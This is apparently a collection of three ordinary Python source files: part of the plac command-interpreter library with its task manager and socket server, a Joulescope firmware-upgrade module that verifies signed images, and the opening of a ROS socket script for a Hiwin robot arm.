lines.append(line[:-1])
break
else:
lines.append(line)
yield ' '.join(lines)
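# Hedged usage sketch (io.StringIO stands in for stdin and is an assumption for
# illustration; not part of the original module): physical lines are joined
# until the terminator character and yielded as one logical line.
def _read_long_line_example():
    import io
    src = io.StringIO("select *\nfrom table\nwhere x = 1;\n")
    return list(read_long_line(src, ';'))  # ['select * from table where x = 1']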
class ReadlineInput(object):
"""
An iterable with a .readline method reading from stdin.
"""
def __init__(self, completions, case_sensitive=True, histfile=None):
self.completions = completions
self.case_sensitive = case_sensitive
self.histfile = histfile
if not case_sensitive:
self.completions = [c.upper() for c in completions]
import readline
self.rl = readline
readline.parse_and_bind("tab: complete")
readline.set_completer(self.complete)
def __enter__(self):
self.old_completer = self.rl.get_completer()
try:
if self.histfile:
self.rl.read_history_file(self.histfile)
except IOError: # the first time
pass
return self
def __exit__(self, etype, exc, tb):
self.rl.set_completer(self.old_completer)
if self.histfile:
self.rl.write_history_file(self.histfile)
def complete(self, kw, state):
# state is 0, 1, 2, ... and increases by hitting TAB
if not self.case_sensitive:
kw = kw.upper()
try:
return [k for k in self.completions if k.startswith(kw)][state]
except IndexError: # no completions
return # exit
def readline(self, prompt=''):
try:
return raw_input(prompt) + '\n'
except EOFError:
return ''
def __iter__(self):
return iter(self.readline, '')
# ################# help functionality in plac interpreters ################# #
class HelpSummary(object):
"Build the help summary consistently with the cmd module"
@classmethod
def add(cls, obj, specialcommands):
p = plac_core.parser_from(obj)
c = cmd.Cmd(stdout=cls())
c.stdout.write('\n')
c.print_topics('special commands',
sorted(specialcommands), 15, 80)
c.print_topics('custom commands',
sorted(obj.commands), 15, 80)
c.print_topics('commands run in external processes',
sorted(obj.mpcommands), 15, 80)
c.print_topics('threaded commands',
sorted(obj.thcommands), 15, 80)
p.helpsummary = str(c.stdout)
def __init__(self):
self._ls = []
def write(self, s):
self._ls.append(s)
def __str__(self):
return ''.join(self._ls)
class PlacFormatter(argparse.RawDescriptionHelpFormatter):
def _metavar_formatter(self, action, default_metavar):
'Remove special commands from the usage message'
choices = action.choices or {}
action.choices = dict((n, c) for n, c in choices.items()
if not n.startswith('.'))
return super(PlacFormatter, self)._metavar_formatter(
action, default_metavar)
def format_help(self):
"Attached to plac_core.ArgumentParser for plac interpreters"
try:
return self.helpsummary
except AttributeError:
return super(plac_core.ArgumentParser, self).format_help()
plac_core.ArgumentParser.format_help = format_help
def default_help(obj, cmd=None):
"The default help functionality in plac interpreters"
parser = plac_core.parser_from(obj)
if cmd is None:
yield parser.format_help()
return
subp = parser.subparsers._name_parser_map.get(cmd)
if subp is None:
yield _('Unknown command %s' % cmd)
elif getattr(obj, '_interact_', False): # in interactive mode
formatter = subp._get_formatter()
formatter._prog = cmd # remove the program name from the usage
formatter.add_usage(
subp.usage, [a for a in subp._actions if a.dest != 'help'],
subp._mutually_exclusive_groups)
formatter.add_text(subp.description)
for action_group in subp._action_groups:
formatter.start_section(action_group.title)
formatter.add_text(action_group.description)
formatter.add_arguments(a for a in action_group._group_actions
if a.dest != 'help')
formatter.end_section()
yield formatter.format_help()
else: # regular argparse help
yield subp.format_help()
# ######################## import management ############################## #
try:
PLACDIRS = os.environ.get('PLACPATH', '.').split(':')
except:
raise ValueError(_('Ill-formed PLACPATH: got %PLACPATHs') % os.environ)
def partial_call(factory, arglist):
"Call a container factory with the arglist and return a plac object"
a = plac_core.parser_from(factory).argspec
if a.defaults or a.varargs or a.varkw:
raise TypeError('Interpreter.call must be invoked on '
'factories with required arguments only')
required_args = ', '.join(a.args)
if required_args:
required_args += ',' # trailing comma
code = '''def makeobj(interact, %s *args):
obj = factory(%s)
obj._interact_ = interact
obj._args_ = args
return obj\n''' % (required_args, required_args)
dic = dict(factory=factory)
exec_(code, dic)
makeobj = dic['makeobj']
makeobj.add_help = False
if inspect.isclass(factory):
makeobj.__annotations__ = getattr(
factory.__init__, '__annotations__', {})
else:
makeobj.__annotations__ = getattr(
factory, '__annotations__', {})
makeobj.__annotations__['interact'] = (
'start interactive interpreter', 'flag', 'i')
return plac_core.call(makeobj, arglist)
def import_main(path, *args):
"""
A utility to import the main function of a plac tool. It also
works with command container factories.
"""
if ':' in path: # importing a factory
path, factory_name = path.split(':')
else: # importing the main function
factory_name = None
if not os.path.isabs(path): # relative path, look at PLACDIRS
for placdir in PLACDIRS:
fullpath = os.path.join(placdir, path)
if os.path.exists(fullpath):
break
else: # no break
raise ImportError(_('Cannot find %s' % path))
else:
fullpath = path
name, ext = os.path.splitext(os.path.basename(fullpath))
module = load_source(name, fullpath)
if factory_name:
tool = partial_call(getattr(module, factory_name), args)
else:
tool = module.main
return tool
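# Hedged example (the paths below are placeholders): import_main('./mytool.py')
# returns mytool.main, while import_main('./mytool.py:Factory', 'arg1')
# instantiates the Factory command container via partial_call with 'arg1'.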
# ############################ Task classes ############################# #
# base class not instantiated directly
class BaseTask(object):
"""
A task is a wrapper over a generator object with signature
Task(no, arglist, genobj), attributes
.no
.arglist
.outlist
.str
.etype
.exc
.tb
.status
and methods .run and .kill.
"""
STATES = ('SUBMITTED', 'RUNNING', 'TOBEKILLED', 'KILLED', 'FINISHED',
'ABORTED')
def __init__(self, no, arglist, genobj):
self.no = no
self.arglist = arglist
self._genobj = self._wrap(genobj)
self.str, self.etype, self.exc, self.tb = '', None, None, None
self.status = 'SUBMITTED'
self.outlist = []
def notify(self, msg):
"Notifies the underlying monitor. To be implemented"
def _wrap(self, genobj, stringify_tb=False):
"""
Wrap the genobj into a generator managing the exceptions,
populating the .outlist, setting the .status and yielding None.
stringify_tb must be True if the traceback must be sent to a process.
"""
self.status = 'RUNNING'
try:
for value in genobj:
if self.status == 'TOBEKILLED': # exit from the loop
raise GeneratorExit
if value is not None: # add output
self.outlist.append(value)
self.notify(decode(value))
yield
except Interpreter.Exit: # wanted exit
self._regular_exit()
raise
except (GeneratorExit, TerminatedProcess, KeyboardInterrupt):
# soft termination
self.status = 'KILLED'
except Exception: # unexpected exception
self.etype, self.exc, tb = sys.exc_info()
self.tb = ''.join(traceback.format_tb(tb)) if stringify_tb else tb
self.status = 'ABORTED'
else:
self._regular_exit()
def _regular_exit(self):
self.status = 'FINISHED'
try:
self.str = '\n'.join(map(decode, self.outlist))
except IndexError:
self.str = 'no result'
def run(self):
"Run the inner generator"
for none in self._genobj:
pass
def kill(self):
"Set a TOBEKILLED status"
self.status = 'TOBEKILLED'
def wait(self):
"Wait for the task to finish: to be overridden"
@property
def traceback(self):
"Return the traceback as a (possibly empty) string"
if self.tb is None:
return ''
elif isinstance(self.tb, (str, bytes)):
return self.tb
else:
return ''.join(traceback.format_tb(self.tb))
@property
def result(self):
self.wait()
if self.exc:
if isinstance(self.tb, (str, bytes)):
raise self.etype(self.tb)
else:
raise_(self.etype, self.exc, self.tb or None)
if not self.outlist:
return None
return self.outlist[-1]
def __repr__(self):
"String representation containing class name, number, arglist, status"
return '<%s %d [%s] %s>' % (
self.__class__.__name__, self.no,
' '.join(self.arglist), self.status)
nulltask = BaseTask(0, [], ('skip' for dummy in (1,)))
# ######################## synchronous tasks ############################## #
class SynTask(BaseTask):
"""
Synchronous task running in the interpreter loop and displaying its
output as soon as available.
"""
def __str__(self):
"Return the output string or the error message"
if self.etype: # there was an error
return '%s: %s' % (self.etype.__name__, self.exc)
else:
return '\n'.join(map(str, self.outlist))
class ThreadedTask(BaseTask):
"""
A task running in a separated thread.
"""
def __init__(self, no, arglist, genobj):
BaseTask.__init__(self, no, arglist, genobj)
self.thread = threading.Thread(target=super(ThreadedTask, self).run)
def run(self):
"Run the task into a thread"
self.thread.start()
def wait(self):
"Block until the thread ends"
self.thread.join()
# ######################## multiprocessing tasks ######################### #
def sharedattr(name, on_error):
"Return a property to be attached to an MPTask"
def get(self):
try:
return getattr(self.ns, name)
except: # the process was killed or died hard
return on_error
def set(self, value):
try:
setattr(self.ns, name, value)
except: # the process was killed or died hard
pass
return property(get, set)
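# Minimal sketch of the sharedattr descriptor (the plain _FakeNS holder is an
# assumption used only for illustration; MPTask stores a multiprocessing
# Namespace in .ns). The function is defined but never invoked here.
def _sharedattr_example():
    class _FakeNS(object):
        pass
    class _Holder(object):
        status = sharedattr('status', 'ABORTED')
        def __init__(self):
            self.ns = _FakeNS()
    h = _Holder()
    h.status = 'RUNNING'   # stored on the shared namespace object
    return h.status        # 'RUNNING'; reads fall back to 'ABORTED' on errors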
class MPTask(BaseTask):
"""
A task running as an external process. The current implementation
only works on Unix-like systems, where multiprocessing uses forks.
"""
str = sharedattr('str', '')
etype = sharedattr('etype', None)
exc = sharedattr('exc', None)
tb = sharedattr('tb', None)
status = sharedattr('status', 'ABORTED')
@property
def outlist(self):
try:
return self._outlist
except: # the process died hard
return []
def notify(self, msg):
self.man.notify_listener(self.no, msg)
def __init__(self, no, arglist, genobj, manager):
"""
The monitor has a .send method and a .man multiprocessing.Manager
"""
self.no = no
self.arglist = arglist
self._genobj = self._wrap(genobj, stringify_tb=True)
self.man = manager
self._outlist = manager.mp.list()
self.ns = manager.mp.Namespace()
self.status = 'SUBMITTED'
self.etype, self.exc, self.tb = None, None, None
self.str = repr(self)
self.proc = multiprocessing.Process(target=super(MPTask, self).run)
def run(self):
"Run the task into an external process"
self.proc.start()
def wait(self):
"Block until the external process ends or is killed"
self.proc.join()
def kill(self):
"""Kill the process with a SIGTERM inducing a TerminatedProcess
exception in the children"""
self.proc.terminate()
# ######################## Task Manager ###################### #
class TaskManager(object):
"""
Store the given commands into a task registry. Provides methods to
manage the submitted tasks.
"""
cmdprefix = '.'
specialcommands = set(['.last_tb'])
def __init__(self, obj):
self.obj = obj
self.registry = {} # {taskno : task}
if obj.mpcommands or obj.thcommands:
self.specialcommands.update(['.kill', '.list', '.output'])
interact = getattr(obj, '_interact_', False)
self.parser = plac_core.parser_from(
obj, prog='' if interact else None, formatter_class=PlacFormatter)
HelpSummary.add(obj, self.specialcommands)
self.man = Manager() if obj.mpcommands else None
signal.signal(signal.SIGTERM, terminatedProcess)
def close(self):
"Kill all the running tasks"
for task in self.registry.values():
try:
if task.status == 'RUNNING':
task.kill()
task.wait()
except: # task killed, nothing to wait
pass
if self.man:
self.man.stop()
def _get_latest(self, taskno=-1, status=None):
"Get the latest submitted task from the registry"
assert taskno < 0, 'You must pass a negative number'
if status:
tasks = [t for t in self.registry.values()
if t.status == status]
else:
tasks = [t for t in self.registry.values()]
tasks.sort(key=attrgetter('no'))
if len(tasks) >= abs(taskno):
return tasks[taskno]
# ########################## special commands ######################## #
@plac_core.annotations(
taskno=('task to kill', 'positional', None, int))
def kill(self, taskno=-1):
'kill the given task (-1 to kill the latest running task)'
if taskno < 0:
task = self._get_latest(taskno, status='RUNNING')
if task is None:
yield 'Nothing to kill'
return
elif taskno not in self.registry:
yield 'Unknown task %d' % taskno
return
else:
task = self.registry[taskno]
if task.status in ('ABORTED', 'KILLED', 'FINISHED'):
yield 'Already finished %s' % task
return
task.kill()
yield task
@plac_core.annotations(
status=('', 'positional', None, str, BaseTask.STATES))
def list(self, status='RUNNING'):
'list tasks with a given status'
for task in self.registry.values():
if task.status == status:
yield task
@plac_core.annotations(
taskno=('task number', 'positional', None, int))
def output(self, taskno=-1, fname=None):
'show the output of a given task (and optionally save it to a file)'
if taskno < 0:
task = self._get_latest(taskno)
if task is None:
yield 'Nothing to show'
return
elif taskno not in self.registry:
yield 'Unknown task %d' % taskno
return
else:
task = self.registry[taskno]
outstr = '\n'.join(map(str, task.outlist))
if fname:
open(fname, 'w').write(outstr)
yield 'saved output of %d into %s' % (taskno, fname)
return
yield task
if len(task.outlist) > 20 and use_less:
less(outstr) # has no meaning for a plac server
else:
yield outstr
@plac_core.annotations(
taskno=('task number', 'positional', None, int))
def last_tb(self, taskno=-1):
"show the traceback of a given task, if any"
task = self._get_latest(taskno)
if task:
yield task.traceback
else:
yield 'Nothing to show'
# ########################## SyncProcess ############################# #
class Process(subprocess.Popen):
"Start the interpreter specified by the params in a subprocess"
def __init__(self, params):
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
# to avoid broken pipe messages
code = '''import plac, sys
sys.argv[0] = '<%s>'
plac.Interpreter(plac.import_main(*%s)).interact(prompt='i>\\n')
''' % (params[0], params)
subprocess.Popen.__init__(
self, [sys.executable, '-u', '-c', code],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.man = multiprocessing.Manager()
def close(self):
"Close stdin and stdout"
self.stdin.close()
self.stdout.close()
self.man.shutdown()
def recv(self): # char-by-char cannot work
"Return the output of the subprocess, line-by-line until the prompt"
lines = []
while True:
lines.append(self.stdout.readline())
if lines[-1] == 'i>\n':
out = ''.join(lines)
return out[:-1] + ' ' # remove last newline
def send(self, line):
"""Send a line (adding a newline) to the underlying subprocess
and wait for the answer"""
self.stdin.write(line + os.linesep)
return self.recv()
class StartStopObject(object):
started = False
def start(self):
pass
def stop(self):
pass
class Monitor(StartStopObject):
"""
    Base monitor class with methods add_listener/del_listener/notify_listener,
    read_queue, and start/stop.
"""
def __init__(self, name, queue=None):
self.name = name
self.queue = queue or multiprocessing.Queue()
def add_listener(self, taskno):
pass
def del_listener(self, taskno):
pass
def notify_listener(self, taskno, msg):
pass
def start(self):
pass
def stop(self):
pass
def read_queue(self):
pass
class Manager(StartStopObject):
"""
The plac Manager contains a multiprocessing.Manager and a set
of slave monitor processes to which we can send commands. There
is a manager for each interpreter with mpcommands.
"""
def __init__(self):
self.registry = {}
self.started = False
self.mp = None
def add(self, monitor):
'Add or replace a monitor in the registry'
proc = multiprocessing.Process(None, monitor.start, monitor.name)
proc.queue = monitor.queue
self.registry[monitor.name] = proc
def delete(self, name):
'Remove a named monitor from the registry'
del self.registry[name]
# can be called more than once
def start(self):
if self.mp is None:
self.mp = multiprocessing.Manager()
for monitor in self.registry.values():
monitor.start()
self.started = True
def stop(self):
for monitor in self.registry.values():
monitor.queue.close()
monitor.terminate()
if self.mp:
self.mp.shutdown()
self.mp = None
self.started = False
def notify_listener(self, taskno, msg):
for monitor in self.registry.values():
monitor.queue.put(('notify_listener', taskno, msg))
def add_listener(self, no):
for monitor in self.registry.values():
monitor.queue.put(('add_listener', no))
# ######################### plac server ############################# #
import asyncore
import asynchat
import socket
class _AsynHandler(asynchat.async_chat):
"asynchat handler starting a new interpreter loop for each connection"
terminator = '\r\n' # the standard one for telnet
prompt = 'i> '
def __init__(self, socket, interpreter):
asynchat.async_chat.__init__(self, socket)
self.set_terminator(self.terminator)
self.i = interpreter
self.i.__enter__()
self.data = []
self.write(self.prompt)
def write(self, data, *args):
"Push a string back to the client"
if args:
data %= args
if data.endswith('\n') and not data.endswith(self.terminator):
data = data[:-1] + self.terminator # fix newlines
self.push(data)
def collect_incoming_data(self, data):
"Collect one character at the time"
self.data.append(data)
def found_terminator(self):
"Put in the queue the line received from the client"
line = ''.join(self.data)
self.log('Received line %r from %s' % (line, self.addr))
if line == 'EOF':
self.i.__exit__(None, None, None)
self.handle_close()
else:
task = self.i.submit(line)
task.run() # synchronous or not
if task.etype: # manage exception
error = '%s: %s\nReceived: %s' % (
task.etype.__name__, task.exc, ' '.join(task.arglist))
self.log_info(task.traceback + error) # on the server
self.write(error + self.terminator) # back to the client
else: # no exception
self.write(task.str + self.terminator)
self.data = []
self.write(self.prompt)
class _AsynServer(asyncore.dispatcher):
"asyncore-based server spawning AsynHandlers"
def __init__(self, interpreter, newhandler, port, listen=5):
self.interpreter = interpreter
self.newhandler = newhandler
self.port = port
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.bind(('', port))
self.listen(listen)
def handle_accept(self):
clientsock, clientaddr = self.accept()
self.log('Connected from %s' % str(clientaddr))
i = self.interpreter.__class__(self.interpreter.obj) # new interpreter
self.newhandler(clientsock, i) # spawn a new handler
# ########################## the Interpreter ############################ #
class Interpreter(object):
"""
A context manager with a .send method and a few utility methods:
execute, test and doctest.
"""
class Exit(Exception):
pass
def __init__(self, obj, commentchar='#', split=shlex.split):
self.obj = obj
try:
self.name = obj.__module__
except AttributeError:
self.name = 'plac'
self.commentchar = commentchar
self.split = split
self._set_commands(obj)
self.tm = TaskManager(obj)
self.man = self.tm.man
self.parser = self.tm.parser
if self.commands:
self.parser.addsubcommands(
self.tm.specialcommands, self.tm, title='special commands')
if obj.mpcommands:
self.parser.addsubcommands(
obj.mpcommands, obj,
title='commands run in external processes')
if obj.thcommands:
self.parser.addsubcommands(
obj.thcommands, obj, title='threaded commands')
self.parser.error = lambda msg: sys.exit(msg) # patch the parser
self._interpreter = None
def _set_commands(self, obj):
"Make sure obj has the right command attributes as Python sets"
for attrname in ('commands', 'mpcommands', 'thcommands'):
setattr(self, attrname, set(getattr(self.__class__, attrname, [])))
setattr(obj, attrname, set(getattr(obj, attrname, [])))
self.commands = obj.commands
self.mpcommands.update(obj.mpcommands)
self.thcommands.update(obj.thcommands)
if (obj.commands or obj.mpcommands or obj.thcommands) and \
not hasattr(obj, 'help'): # add default help
obj.help = default_help.__get__(obj, obj.__class__)
self.commands.add('help')
def __enter__(self):
"Start the inner interpreter loop"
self._interpreter = self._make_interpreter()
self._interpreter.send(None)
return self
def __exit__(self, exctype, exc, tb):
"Close the inner interpreter and the task manager"
self.close(exctype, exc, tb)
def submit(self, line):
"Send a line to the underlying interpreter and return a task object"
if self._interpreter is None:
raise RuntimeError(_('%r not initialized: probably you forgot to '
'use the with statement') % self)
if isinstance(line, (str, bytes)):
arglist = self.split(line, self.commentchar)
else: # expects a list of strings
arglist = line
if not arglist:
return nulltask
m = self.tm.man # manager
if m and not m.started:
m.start()
task = self._interpreter.send(arglist) # nonblocking
if not plac_core._match_cmd(arglist[0], self.tm.specialcommands):
self.tm.registry[task.no] = task
if m:
m.add_listener(task.no)
return task
def send(self, line):
"""Send a line to the underlying interpreter and return
the finished task"""
task = self.submit(line)
BaseTask.run(task) # blocking
return task
def tasks(self):
"The full lists of the submitted tasks"
return self.tm.registry.values()
def close(self, exctype=None, exc=None, tb=None):
"Can be called to close the interpreter prematurely"
self.tm.close()
if exctype is not None:
self._interpreter.throw(exctype, exc, tb)
else:
self._interpreter.close()
def _make_interpreter(self):
"The interpreter main loop, from lists of arguments to task objects"
enter = getattr(self.obj, '__enter__', lambda: None)
exit = getattr(self.obj, '__exit__', lambda et, ex, tb: None)
enter()
task = None
try:
for no in itertools.count(1):
arglist = yield task
try:
cmd, result = self.parser.consume(arglist)
except SystemExit as e: # for invalid commands
if e.args == (0,): # raised as sys.exit(0)
errlist = []
else:
errlist = [str(e)]
task = SynTask(no, arglist, iter(errlist))
continue
except: # anything else
task = SynTask(no, arglist, gen_exc(*sys.exc_info()))
continue
if not plac_core.iterable(result): # atomic result
task = SynTask(no, arglist, gen_val(result))
elif cmd in self.obj.mpcommands:
task = MPTask(no, arglist, result, self.tm.man)
elif cmd in self.obj.thcommands:
task = ThreadedTask(no, arglist, result)
else: # blocking task
task = SynTask(no, arglist, result)
except GeneratorExit: # regular exit
exit(None, None, None)
except: # exceptional exit
exit(*sys.exc_info())
raise
def check(self, given_input, expected_output):
"Make sure you get the expected_output from the given_input"
output = self.send(given_input).str # blocking
ok = (output == expected_output)
if not ok:
# the message here is not internationalized on purpose
msg = 'input: %s\noutput: %s\nexpected: %s' % (
given_input, output, expected_output)
raise AssertionError(msg)
def _parse_doctest(self, lineiter):
"Returns the lines of input, the lines of output, and the line number"
lines = [line.strip() for line in lineiter]
inputs = []
positions = []
for i, line in enumerate(lines):
if line.startswith('i> '):
inputs.append(line[3:])
positions.append(i)
positions.append(len(lines) + 1) # last position
outputs = []
for i, start in enumerate(positions[:-1]):
end = positions[i + 1]
outputs.append('\n'.join(lines[start+1:end]))
return zip(inputs, outputs, positions)
def doctest(self, lineiter, verbose=False):
"""
        Parse a text containing doctests in a context and test all of them.
        Raise an error even if a single doctest is broken. Use this for
        sequential tests which are logically grouped.
"""
with self:
try:
for input, output, no in self._parse_doctest(lineiter):
if verbose:
write('i> %s\n' % input)
write('-> %s\n' % output)
task = self.send(input) # blocking
if not str(task) == output:
msg = ('line %d: input: %s\noutput: %s\nexpected: %s\n'
% (no + 1, input, task, output))
write(msg)
if task.exc:
raise_(task.etype, task.exc, task.tb)
except self.Exit:
pass
def execute(self, lineiter, verbose=False):
"Execute a lineiter of commands in a context and print the output"
with self:
try:
for line in lineiter:
if verbose:
write('i> ' + line)
task = self.send(line) # finished task
if task.etype: # there was an error
raise_(task.etype, task.exc, task.tb)
write('%s\n' % task.str)
except self.Exit:
pass
def multiline(self, stdin=sys.stdin, terminator=';', verbose=False):
"The multiline mode is especially suited for usage with emacs"
with self:
try:
for line in read_long_line(stdin, terminator):
task = self.submit(line)
task.run()
write('%s\n' % task.str)
if verbose and task.traceback:
write(task.traceback)
except self.Exit:
pass
def interact(self, stdin=sys.stdin, prompt='i> ', verbose=False):
"Starts an interactive command loop reading commands from the consolle"
try:
import readline
readline_present = True
except ImportError:
readline_present = False
if stdin is sys.stdin and readline_present: # use readline
histfile = os.path.expanduser('~/.%s.history' % self.name)
completions = list(self.commands) + list(self.mpcommands) + \
list(self.thcommands) + list(self.tm.specialcommands)
self.stdin = ReadlineInput(completions, histfile=histfile)
else:
self.stdin = stdin
self.prompt = prompt
self.verbose = verbose
intro = self.obj.__doc__ or ''
write(intro + '\n')
with self:
self.obj._interact_ = True
if self.stdin is sys.stdin: # do not close stdin automatically
self._manage_input()
else:
with self.stdin: # close stdin automatically
self._manage_input()
def _manage_input(self):
"Convert input lines into task which are then executed"
try:
for line in iter(lambda: read_line(self.stdin, self.prompt), ''):
line = line.strip()
if not line:
continue
task = self.submit(line)
task.run() # synchronous or not
write(str(task) + '\n')
if self.verbose and task.etype:
write(task.traceback)
except self.Exit:
pass
def start_server(self, port=2199, **kw):
"""Starts an asyncore server reading commands for clients and opening
a new interpreter for each connection."""
_AsynServer(self, _AsynHandler, port) # register the server
try:
asyncore.loop(**kw)
except (KeyboardInterrupt, TerminatedProcess):
pass
finally:
asyncore.close_all()
def add_monitor(self, mon):
self.man.add(mon)
def del_monitor(self, name):
self.man.delete(name)
@classmethod
def call(cls, factory, arglist=sys.argv[1:],
commentchar='#', split=shlex.split,
stdin=sys.stdin, prompt='i> ', verbose=False):
"""
Call a container factory with the arglist and instantiate an
interpreter object. If there are remaining arguments, send them to the
interpreter, else start an interactive session.
"""
obj = partial_call(factory, arglist)
i = cls(obj, commentchar, split)
if i.obj._args_:
with i:
task = i.send(i.obj._args_) # synchronous
if task.exc:
raise_(task.etype, task.exc, task.tb)
out = str(task)
if out:
print(out)
elif i.obj._interact_:
i.interact(stdin, prompt, verbose)
else:
i.parser.print_usage()
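# Illustrative usage sketch (not part of the original module): a tiny command
# container driven through Interpreter.check()/send(); the container class and
# its 'add' command are invented for this example.
class _ExampleCommands(object):
    commands = ['add']
    def add(self, a, b):
        "add two integers and return the sum"
        return int(a) + int(b)
def _interpreter_example():
    with Interpreter(_ExampleCommands()) as i:
        i.check('add 1 2', '3')          # raises AssertionError on a mismatch
        return i.send('add 40 2').str    # expected to be '42'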
# ################################## runp ################################### #
class _TaskLauncher(object):
"Helper for runp"
def __init__(self, genseq, mode):
if mode == 'p':
self.mpcommands = ['rungen']
else:
self.thcommands = ['rungen']
self.genlist = list(genseq)
def rungen(self, i):
for out in self.genlist[int(i) - 1]:
yield out
def runp(genseq, mode='p'):
"""Run a sequence of generators in parallel. Mode can be 'p' (use processes)
or 't' (use threads). After all of them are finished, return a list of
task objects.
"""
assert mode in 'pt', mode
launcher = _TaskLauncher(genseq, mode)
res = []
with Interpreter(launcher) as inter:
for i in range(len(launcher.genlist)):
inter.submit('rungen %d' % (i + 1)).run()
for task in inter.tasks():
try:
res.append(task.result)
except Exception as e:
res.append(e)
return res
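# Minimal usage sketch (not part of the original module): runp() runs each
# generator in its own thread ('t') or process ('p') and returns the collected
# results, with an exception object taking the place of a failed task's result.
def _count_up(n):
    for i in range(n):
        yield i
def _runp_example():
    # three generators executed in parallel threads
    return runp([_count_up(2), _count_up(3), _count_up(4)], mode='t')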
|
firmware_manager.py
|
# Copyright 2019 Jetperch LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from joulescope.bootloader import Bootloader
from joulescope.driver import bootloader_go
from zipfile import ZipFile
import monocypher
import binascii
import json
import logging
import threading
log = logging.getLogger(__name__)
SIGNING_KEY_PUBLIC = binascii.unhexlify(b'32fe2bed04bbc42fe1b382e0371ba95ec2947045e8d919e49fdef601e24c105e')
VERSIONS = {
'namespace': 'joulescope',
'type': 'firmware-versions',
'version': 1,
'data': {
'format': 'js110_{version}.img',
# alpha
# beta
'production': '1.1.0',
'available': ['1.1.0']
}
}
def load(path):
with ZipFile(path, mode='r') as f_zip:
with f_zip.open('index.json', 'r') as f:
index_bytes = f.read()
with f_zip.open('index.sig', 'r') as f:
index_sig = binascii.unhexlify(f.read())
if not monocypher.signature_check(index_sig, SIGNING_KEY_PUBLIC, index_bytes):
log.warning('integrity check failed: index.json')
return None
index = json.loads(index_bytes.decode('utf-8'))
for image in index['target']['images']:
with f_zip.open(index['data'][image]['image'], 'r') as f:
index['data'][image]['image'] = f.read()
sig = binascii.unhexlify(index['data'][image]['signature'])
if not monocypher.signature_check(sig, SIGNING_KEY_PUBLIC, index['data'][image]['image']):
log.warning('integrity check failed: %s' % (image, ))
return None
return index
def version_required(release=None):
release = 'production' if release is None else str(release)
v = VERSIONS['data'][release]
return tuple([int(x) for x in v.split('.')])
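# Illustrative sketch (not part of the original module): version_required()
# returns a comparable tuple, so a firmware check reduces to tuple comparison
# against the device's reported (major, minor, patch) version.
def _needs_upgrade(device_version, release=None):
    """Return True when device_version, e.g. (1, 0, 3), is older than the
    required release listed in VERSIONS."""
    return tuple(device_version) < version_required(release)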
class UpgradeThread:
def __init__(self, device, image, progress_cbk, stage_cbk, done_cbk):
self.device = device
self.image = image
self.progress_cbk = progress_cbk
self.stage_cbk = stage_cbk
self.done_cbk = done_cbk
def run(self):
d = None
try:
d = upgrade(self.device, self.image, self.progress_cbk, self.stage_cbk)
finally:
self.done_cbk(d)
def upgrade(device, image, progress_cbk=None, stage_cbk=None, done_cbk=None):
"""Full upgrade the device's firmware.
:param device: The :class:`Device` or class:`bootloader.Bootloader` instance
that must already be open.
:param image: The image returned by :func:`load`. Alternatively, a path
suitable for :func:`load`.
:param progress_cbk: The optional Callable[float] which is called
with the progress fraction from 0.0 to 1.0
:param stage_cbk: The optional Callable[str] which is called with a
meaningful stage description for each stage of the upgrade process.
:param done_cbk: The optional Callback[object] which is called with
the device on success or None on failure. If done_cbk is provided,
then run the upgrade in its own thread.
:return: The :class:`Device` which is closed.
    :raise IOError: on failure.
"""
if done_cbk is not None:
t = UpgradeThread(device, image, progress_cbk, stage_cbk, done_cbk)
thread = threading.Thread(name='fw_upgrade', target=t.run)
thread.start()
return thread
try:
cbk_data = {
'stages': [
('Load image', 0.05),
('Start bootloader', 0.05),
('Program application', 0.1),
('Start application', 0.05),
('Program sensor', 0.75),
('Done', 0.0),
],
'stage': -1,
}
def next_stage():
cbk(1.0)
cbk_data['stage'] += 1
s, _ = cbk_data['stages'][cbk_data['stage']]
log.info('firmware_upgrade: %s', s)
if stage_cbk:
stage_cbk(s)
def cbk(progress):
previous = 0.0
for idx in range(cbk_data['stage']):
previous += cbk_data['stages'][idx][1]
current = cbk_data['stages'][cbk_data['stage']][1]
if progress_cbk:
progress_cbk(previous + progress * current)
next_stage()
if isinstance(image, str):
image = load(image)
next_stage()
if not isinstance(device, Bootloader):
b, _ = device.bootloader(progress_cbk=cbk)
else:
b = device
try:
next_stage()
rc = b.firmware_program(image['data']['controller']['image'], progress_cbk=cbk)
if rc:
                raise IOError('controller firmware programming failed: %d' % rc)
next_stage()
except:
b.close()
raise
d = bootloader_go(b, progress_cbk=cbk)
next_stage()
d.open()
try:
d.sensor_firmware_program(image['data']['sensor']['image'], progress_cbk=cbk)
finally:
d.close()
if done_cbk:
done_cbk(d)
return d
except:
if done_cbk:
done_cbk(None)
raise
def run():
import sys
from joulescope.driver import scan_require_one
with scan_require_one() as d:
upgrade(d, sys.argv[1], progress_cbk=print, stage_cbk=print)
if __name__ == '__main__':
run()
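# Illustrative sketch (not part of the original module): when done_cbk is
# supplied, upgrade() returns immediately with its worker thread, so the caller
# joins the thread and receives the result through the callback. Device
# discovery mirrors run() above; the image path argument is a placeholder.
def _threaded_upgrade_example(image_path):
    from joulescope.driver import scan_require_one
    results = []
    with scan_require_one() as d:
        t = upgrade(d, image_path, progress_cbk=print, stage_cbk=print,
                    done_cbk=results.append)
        t.join()  # block until the upgrade thread has invoked done_cbk
    # results[0] is the upgraded (closed) Device on success, or None on failure
    return results[0] if results else None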
|
Hiwin_RT605_ArmCommand_Socket_20190627203904.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
## multithreading
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
#Socket = 0
data = '0' # initial value of the transmitted data
Arm_feedback = 1 # assume the arm is busy
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
